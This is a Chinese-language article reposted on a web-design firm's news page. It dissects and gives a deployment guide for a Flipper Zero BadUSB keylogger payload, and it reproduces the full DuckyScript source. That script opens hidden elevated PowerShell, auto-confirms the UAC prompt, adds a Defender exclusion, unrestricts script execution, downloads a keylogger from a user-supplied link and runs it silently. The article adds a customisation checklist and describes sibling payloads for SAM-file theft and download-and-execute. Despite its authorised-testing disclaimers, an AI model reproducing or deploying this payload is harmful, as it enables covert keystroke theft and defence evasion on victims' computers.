ARTICLE DETAIL

资讯详情

深耕郑州网站建设与运营推广的一线实战洞察。

Flipper Zero BadUSB 注入软件键盘记录器:UNC0V3R3D Keylogger 载荷解析与定制部署指南

Flipper Zero BadUSB 注入软件键盘记录器:UNC0V3R3D Keylogger 载荷解析与定制部署指南 Flipper Zero BadUSB 注入软件键盘记录器UNC0V3R3D Keylogger 载荷解析与定制部署指南【免费下载链接】FlipperPlayground (and dump) of stuff I make or modify for the Flipper Zero项目地址: https://gitcode.com/GitHub_Trending/fl/Flipper导读本篇技术指南以BadUSB/UNC0V3R3D-BadUSB-Collection中 Exfiltration数据渗出分类下的 Keylogger 载荷为核心逐行解析其 DuckyScript 源码说明它如何借助 Flipper Zero 的 BadUSB 能力打开 PowerShell、下载远程.ps键盘记录脚本并静默执行。读完本文你将掌握该载荷的完整运行链路、部署前的必要定制步骤替换下载地址等、同集合中可对照参考的渗出类载荷以及安全测试环境下的使用边界。载荷定位集合背景与适用人群Keylogger 载荷位于 UNC0V3R3D-BadUSB-Collection 仓库的 Windows BadUSB 脚本集内目录路径为 Exfiltration/Keylogger包含两个文件readme.md使用说明文档明确标注了适用人群、使用前提与功能特性Keylogger.txt可供 Flipper Zero BadUSB 直接运行的 DuckyScript 1.0 载荷源码。原作者在 readme 中开门见山地强调This script is only for experienced penetration testers本脚本仅面向有经验的渗透测试人员。同时集合根目录的 README 也给出了明确的使用协议——本项目仅用于教育目的运行任何脚本前必须先征得目标所有者授权作者对因使用脚本造成的任何损害不承担责任。这一点是使用该载荷的绝对前提。集合根目录的 README 还交代了脚本的技术基础所有 BadUSB 脚本均以DuckyScript 1.0语言编写其中约 97% 的脚本借助 PowerShell 实现机器控制脚本内以REM开头的行是注释通常用于解释每一步的执行过程。功能特性与运行流程总览依据 readme.md该载荷的核心特性为三步流程打开 PowerShellopen powershell下载.ps脚本download .ps script执行脚本execute script原作者同时给出重要提示该脚本并非即插即用not plug and play使用前必须完成一项关键修改——将载荷中的下载地址替换为你自己的键盘记录.ps脚本链接即把STRING wget (LINK TO KEYLOGGER)这一行改成实际的 URL。这条打开 → 下载 → 执行的链路也是整个 UNC0V3R3D 集合中下载执行类载荷的通用模板后续章节将对照源码逐一验证。载荷源码逐行解析Keylogger.txt 完整源码如下REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) REM Description: This script allows you to inject a software keylogger in victims PC REM Version: 1.0 REM Category: Exfiltration DELAY 2500 GUI d DELAY 500 GUI r DELAY 500 STRING powershell.exe -windowstyle hidden DELAY 200 CTRL SHIFT ENTER DELAY 5000 LEFT DELAY 150 ENTER DELAY 5000 STRING cd C:\Users\Public\Documents ENTER STRING Add-MpPreference -ExclusionExtension ps1 -Force ENTER STRING Set-ExecutionPolicy unrestricted -Force ENTER STRING wget (LINK TO KEYLOGGER) -OutFile script.ps1 ENTER DELAY 3500 STRING powershell.exe -noexit -windowstyle hidden -file script.ps1 ENTER CAPSLOCK DELAY 150 CAPSLOCK DELAY 150 CAPSLOCK DELAY 150 CAPSLOCK DELAY 2000 CAPSLOCK DELAY 150 CAPSLOCK DELAY 150 CAPSLOCK DELAY 150 CAPSLOCK REM End of payload下面按执行阶段逐步拆解。阶段一头部声明与启动等待REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) REM Description: This script allows you to inject a software keylogger in victims PC REM Version: 1.0 REM Category: Exfiltration DELAY 2500前四行REM是 DuckyScript 注释记录作者UNC0V3R3D、用途向目标 PC 注入软件键盘记录器、版本1.0与分类Exfiltration即数据渗出。DELAY 2500表示脚本开始后先等待 2500 毫秒单位毫秒为操作系统完成 USB 设备枚举、显示就绪留出时间。集合 README 的故障排查章节明确指出DELAY后的数字代表毫秒延迟过短是脚本乱开窗口、把文本打错地方的最常见原因遇到此类问题应把延迟值调大例如DELAY 500→DELAY 700。阶段二打开运行对话框并隐藏启动 PowerShellGUI d DELAY 500 GUI r DELAY 500 STRING powershell.exe -windowstyle hidden DELAY 200 CTRL SHIFT ENTER DELAY 5000 LEFT DELAY 150 ENTER DELAY 5000GUI d按下Win D回到桌面确保后续操作发生在干净的桌面焦点下GUI r按下Win R打开运行对话框STRING powershell.exe -windowstyle hidden键入带-windowstyle hidden参数的命令以隐藏窗口模式启动 PowerShell避免在目标屏幕上弹出明显的控制台窗口CTRL SHIFT ENTER在运行框中以管理员身份触发启动。Ctrl Shift Enter会调出 UAC 用户账户控制提示DELAY 5000等待 UAC 弹窗出现LEFTENTERUAC 弹窗默认焦点通常在是按钮上向左移动光标并回车确认提权。注意这一系列按键只是在目标用户已登录会话中自动点击确认并非利用漏洞绕过 UAC——若目标机器 UAC 设置为始终通知或当前会话无管理员权限该步骤可能失败这也是原作者强调需要经验丰富的测试人员反复校准延迟与按键序列的原因。阶段三切换工作目录并关闭防护STRING cd C:\Users\Public\Documents ENTER STRING Add-MpPreference -ExclusionExtension ps1 -Force ENTER STRING Set-ExecutionPolicy unrestricted -Force ENTERcd C:\Users\Public\Documents进入C:\Users\Public\Documents公共用户目录普通用户即可读写且不易引起注意Add-MpPreference -ExclusionExtension ps1 -Force向 Windows Defender 添加ps1扩展名的排除项降低后续下载的.ps1文件被实时防护查杀的概率Set-ExecutionPolicy unrestricted -Force将当前作用域的执行策略强制设为unrestricted允许直接运行未经签名的 PowerShell 脚本。这两条命令共同服务于同一个目标为下载 → 执行外部 .ps 脚本铺平道路——一个是规避 AV 静态扫描一个是解除脚本运行策略限制。阶段四下载键盘记录脚本STRING wget (LINK TO KEYLOGGER) -OutFile script.ps1 ENTER DELAY 3500这是全脚本唯一需要用户定制的地方把(LINK TO KEYLOGGER)替换为你自己托管的键盘记录.ps脚本的直链。在 PowerShell 中wget是Invoke-WebRequest的别名-OutFile script.ps1将下载内容保存为当前目录即上一步进入的Public\Documents下的script.ps1。DELAY 3500为下载过程预留约 3.5 秒实际使用时若脚本体积较大或目标网络较慢可酌情增大该延迟避免下一步执行时文件尚未下载完成。阶段五静默执行键盘记录脚本STRING powershell.exe -noexit -windowstyle hidden -file script.ps1 ENTER CAPSLOCK DELAY 150 CAPSLOCK DELAY 150 CAPSLOCK DELAY 150 CAPSLOCK DELAY 2000 CAPSLOCK DELAY 150 CAPSLOCK DELAY 150 CAPSLOCK DELAY 150 CAPSLOCK REM End of payloadpowershell.exe -noexit -windowstyle hidden -file script.ps1以隐藏窗口模式启动并执行script.ps1。-noexit使脚本执行完毕后 PowerShell 进程不立即退出-windowstyle hidden继续保持静默。末尾连续 8 次CAPSLOCK中间穿插短延迟是脚本的收尾动作。readme 与注释均未说明其用途从行为上只能确认它会以一定节奏切换大小写锁定状态结合此类载荷的常见做法可以推断这一序列可能用于触发键盘记录器事件或作为运行完成后的时序标记但这一点在仓库文档中并无直接证据使用时不必依赖该行为也不应将其当作既定功能描述。至此打开 PowerShell → 下载 .ps → 执行脚本三条特性在源码层面全部得到印证。部署前的定制清单实战检查表结合 readme.md 的说明与源码结构正式使用前建议按以下顺序核对替换下载地址将Keylogger.txt中wget (LINK TO KEYLOGGER)替换为真实的.ps直链并确认链接可匿名访问、无需登录跳转校验延迟值在目标机器环境虚拟机优先实测各DELAY尤其是5000的 UAC 等待与3500的下载等待必要时按集合 README 的建议调大确认执行策略与杀软状态脚本已内置Add-MpPreference与Set-ExecutionPolicy处理但如果目标环境的组策略强制覆盖这些设置下载与执行环节可能失败先在虚拟机验证集合 README 明确建议测试脚本时应使用虚拟机保障安全切勿在个人主力机上运行未知脚本将文件导入 Flipper参照集合 README 的新手指引通过 qFlipper 桌面应用或手机 App 将Keylogger.txt放入 Flipper 的badusb目录在 Flipper 上进入 BadUSB 分类选中脚本插入目标电脑 USB 口后按中键执行。同集合渗出类载荷的对照参考Keylogger 并非该集合中唯一的数据渗出载荷理解兄弟脚本有助于把握整套模板的设计思路。以下几个文件可在同一目录树下对照学习SAMexfil.txt通过 WMI 创建卷影副本Win32_ShadowCopy绕过 SAM 文件锁定用mklink建立符号链接后复制C:\Windows\System32\config\SAM再压缩成 zip 留存其提权启动与执行策略设置的段落与 Keylogger 高度同构General_PC_Information.txt以管理员 PowerShell 采集操作系统、BIOS 序列号、CPU、内存、硬盘、显卡、防火墙状态等信息并生成 HTML 报告其中同样包含Set-ExecutionPolicy、-windowstyle hidden等惯用组合Invisible_DownExec.txt 与 DownloadAnyEXE.txt展示了下载并执行模板的两种变体前者通过嵌套Start-Process powershell与Invoke-WebRequest在临时目录下载执行 EXE后者将可执行文件写入C:\windows\后运行——Keylogger 的wget OutFile 隐藏执行正是这一家族模板在脚本下载场景下的应用。对照阅读这些文件可以明显看出 UNC0V3R3D 集合的通用编写范式GUI r或GUI dGUI r打开运行框 → 提权启动 PowerShell → 调整执行策略与杀软排除 → 下载载荷 → 隐藏窗口执行。掌握这套范式后你不仅能使用现成载荷也能理解并自行维护同类 BadUSB 脚本。故障排查要点集合根目录 README 的 Troubleshooting 章节给出了两条与 Keylogger 直接相关的通用经验脚本乱开窗口、文本输入位置错乱几乎都是DELAY过短导致。将相应延迟调大如 500 → 700 毫秒即可Flipper 报ERROR: line N检查文本文件最常见原因是命令之间混入了空行其次是包含LOCALE ..命令该命令在 Flipper 上无法正常工作再次是行首存在多余空格。Keylogger 载荷本身无空行、无 LOCALE 行若自行编辑后报错请按上述顺序排查。安全边界与免责声明本文仅基于 Keylogger 目录 中公开的 readme 与载荷源码进行技术解析。键盘记录属于典型的敏感渗透能力其使用场景应严格限定为已获授权的渗透测试、红队演练、个人实验环境或明确授权的教育用途。原文档与集合协议均已声明仅限教育目的、运行前须获得授权且作者不对任何滥用行为造成的损害负责。请务必在受控虚拟机中完成全部验证不要在未授权设备上运行。小结Flipper Zero BadUSB 键盘记录载荷以最精简的 DuckyScript 实现了隐藏 PowerShell → 提权 → 关闭防护 → 远程下载脚本 → 静默执行的完整链路。原文档强调的两点核心信息——仅限有经验的渗透测试人员使用、并非即插即用必须替换下载链接——是理解与使用该载荷的钥匙结合源码逐行分析与同集合兄弟脚本对照即可完整掌握其机制并在此基础上安全地开展授权测试。【免费下载链接】FlipperPlayground (and dump) of stuff I make or modify for the Flipper Zero项目地址: https://gitcode.com/GitHub_Trending/fl/Flipper创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
返回列表